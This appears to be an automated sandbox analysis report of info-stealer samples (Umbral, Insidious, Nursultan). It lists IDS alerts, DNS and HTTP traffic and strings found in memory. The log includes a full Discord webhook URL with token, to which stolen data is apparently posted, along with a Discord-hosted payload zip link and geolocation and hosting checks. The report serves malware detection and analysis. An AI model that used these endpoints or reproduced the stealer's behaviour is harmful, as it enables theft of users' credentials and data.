                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 208.95.112.1:80
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49753 -> 208.95.112.1:80
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49769 -> 208.95.112.1:80
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49783 -> 208.95.112.1:80
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49798 -> 208.95.112.1:80
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49812 -> 208.95.112.1:80
                            Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49827 -> 208.95.112.1:80
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1 | Host: ip-api.com
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                            Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                            Source: global traffic | DNS traffic detected: DNS query: freegeoip.app
                            Source: global traffic | DNS traffic detected: DNS query: ipbase.com
                            Source: global traffic | DNS traffic detected: DNS query: stage-von.gl.at.ply.gg
                            Source: global traffic | DNS traffic detected: DNS query: discord.com
                            Source: unknown | HTTP traffic detected: POST /api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9 HTTP/1.1 | Accept: application/json | User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17 | Content-Type: application/json; charset=utf-8 | Host: discord.com | Content-Length: 941 | Expect: 100-continue | Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 06 Sep 2024 23:47:06 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Age: 30232 | Cache-Control: public,max-age=0,must-revalidate | Cache-Status: "Netlify Edge"; hit | Vary: Accept-Encoding | X-Nf-Request-Id: 01J74VQZB0JK42WEQKAE0QYVXS | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGH9z3Oazcl8kTG3xkdmnqlu%2FbyjJ36%2FtKPgCmbObjnXq2fnPeaPaifCz41PpWbhSFxirjyVnXve7fqxFEiJryUsS7c7nVNxOkXHOMTevgpDRZmTmxt%2FR%2FGiid1P"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8bf2579bac7ac331-EWR | alt-svc: h3=":443"; ma=86400
Source: cert9.db.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: cert9.db.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: cert9.db.11.dr | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: cert9.db.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: cert9.db.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: cert9.db.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: cert9.db.11.dr | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6749000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: Insidious.exe, 0000000B.00000002.2166607567.00000245126BC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://freegeoip.app
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB66A5000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/?fielH
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.dr | String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: Nursultan.exe, 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, Microsoft Edge.exe, 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.3.dr, Microsoft Edge.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.dr | String found in binary or memory: http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-
Source: Insidious.exe, 0000000B.00000002.2166607567.00000245126F6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ipbase.com
Source: powershell.exe, 00000006.00000002.2309953331.00000118AA631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: cert9.db.11.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: cert9.db.11.dr | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2168729014.000001189A7E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Microsoft Edge.exe, 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2168729014.000001189A5C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2168729014.000001189A7E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: cert9.db.11.dr | String found in binary or memory: http://x1.c.lencr.org/0
Source: cert9.db.11.dr | String found in binary or memory: http://x1.i.lencr.org/0
Source: nursultan.bat.4.dr | String found in binary or memory: https://0.0.0.0
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000006.00000002.2168729014.000001189A5C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2240500054.000001AB15891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.00000245126D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.vimeworld.ru/u
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000026.00000002.2168782168.000001CFADD31000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000038.00000002.2206155033.00000220C94C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.vimeworld.ru/user/name/
Source: Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.dr | String found in binary or memory: https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?ex=
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: Umbral.exe.4.dr | String found in binary or memory: https://discord.com/api/v10/users/
Source: Umbral.exe, 0000003D.00000002.2205074841.00000232B9D71000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe.4.dr | String found in binary or memory: https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.comyhl8
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.dr | String found in binary or memory: https://discordapp.com/api/v9/users/
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/:
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/J
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/:
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/J
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chr
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chr.
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chro0b
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.0b
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/:
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/?lfhs=2
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/J
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://freegeoip.app
Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://freegeoip.app/xml/
Source: Insidious.exe, 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000026.00000002.2168782168.000001CFADD31000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000038.00000002.2206155033.00000220C94C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://freegeoip.app/xml/8
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Umbral-Steal
Source: Umbral.exe.4.dr | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealerh
Source: powershell.exe, 0000002D.00000002.2240500054.000001AB15AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5DE1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.dr | String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: Insidious.exe, 0000000B.00000002.2166607567.00000245126E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipbase.com
Source: Insidious.exe, 0000000B.00000002.2166607567.00000245126BC000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.00000245126E1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.00000245126DD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ipbase.com/xml/
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/:
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/J
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1277266726186385433/128176282554
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?e
Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E3A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1277266726186385433/128176282554=
Source: powershell.exe, 00000006.00000002.2309953331.00000118AA631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
